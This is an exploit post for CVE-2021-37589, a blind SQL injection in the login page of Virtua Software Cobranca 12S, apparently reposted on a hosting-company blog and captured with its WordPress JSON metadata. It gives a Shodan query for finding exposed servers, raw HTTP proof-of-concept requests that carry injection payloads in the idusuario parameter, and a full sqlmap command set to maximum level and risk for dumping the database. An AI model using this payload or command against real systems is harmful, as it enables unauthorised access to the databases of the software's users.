# Exploit Title: Virtua Software Cobranca 12S – SQLi
\n# Shodan Query: http.favicon.hash:876876147
\n# Date: 13\/08\/2021
\n# Exploit Author: Luca Regne
\n# Vendor Homepage: https:\/\/www.virtuasoftware.com.br\/
\n# Software Link: https:\/\/www.virtuasoftware.com.br\/downloads\/Cobranca12S_13_08.exe
\n# Version: 12S
\n# Tested on: Windows Server 2019
\n# CVE : CVE-2021-37589
\n————————————————————————<\/p>\n
## Description
\nA Blind SQL injection vulnerability in a Login Page (\/controller\/login.php) in Virtua Cobranca 12S version allows remote unauthenticated attackers to get information about application executing arbitrary SQL commands by idusuario parameter.<\/p>\n
## Request PoC
\n“`
\nPOST \/controller\/login.php?acao=autenticar HTTP\/1.1
\nHost: redacted.com
\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:90.0) Gecko\/20100101 Firefox\/90.0
\nAccept: application\/json, text\/javascript, *\/*; q=0.01
\nAccept-Language: en-US,en;q=0.5
\nAccept-Encoding: gzip, deflate
\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8
\nX-Requested-With: XMLHttpRequest
\nContent-Length: 37
\nConnection: close
\nCookie: origem_selecionado=; PHPSESSID=<\/p>\n
idusuario=’&idsenha=awesome_and_unprobaly_password&tipousr=Usuario<\/p>\n
“`<\/p>\n
This request causes an error 500. Changing the idusuario to “‘+AND+’1’%3d’1’–” the response to request was 200 status code with message of authentication error.<\/p>\n
“`
\nPOST \/controller\/login.php?acao=autenticar HTTP\/1.1
\nHost: redacted.com
\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:90.0) Gecko\/20100101 Firefox\/90.0
\nAccept: application\/json, text\/javascript, *\/*; q=0.01
\nAccept-Language: en-US,en;q=0.5
\nAccept-Encoding: gzip, deflate
\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8
\nX-Requested-With: XMLHttpRequest
\nContent-Length: 37
\nConnection: close
\nCookie: origem_selecionado=; PHPSESSID=<\/p>\n
idusuario=’+AND+’1’=’1′–&idsenha=a&tipousr=Usuario<\/p>\n
“`<\/p>\n
## Exploit
\nSave the request from burp to file
\n“`bash
\npython3 sqlmap.py -r ~\/req-virtua.txt -p idusuario –dbms firebird –level 5 –risk 3 –random-agent
\n“`<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: Virtua Software Cobranca 12S – SQLi # Shodan Query: http.favicon.hash:876876147 # Date: 13\/08\/2021 # Exploit Author: Luca Regne # Vendor Homepage: https:\/\/www.virtuasoftware.com.br\/ # Software Link: https:\/\/www.virtuasoftware.com.br\/downloads\/Cobranca12S_13_08.exe # Version: 12S # Tested on: Windows Server 2019 # CVE : CVE-2021-37589 ———————————————————————— ## Description A Blind SQL injection vulnerability in a Login Page (\/controller\/login.php) …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-25911","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/25911","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=25911"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/25911\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=25911"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=25911"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=25911"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}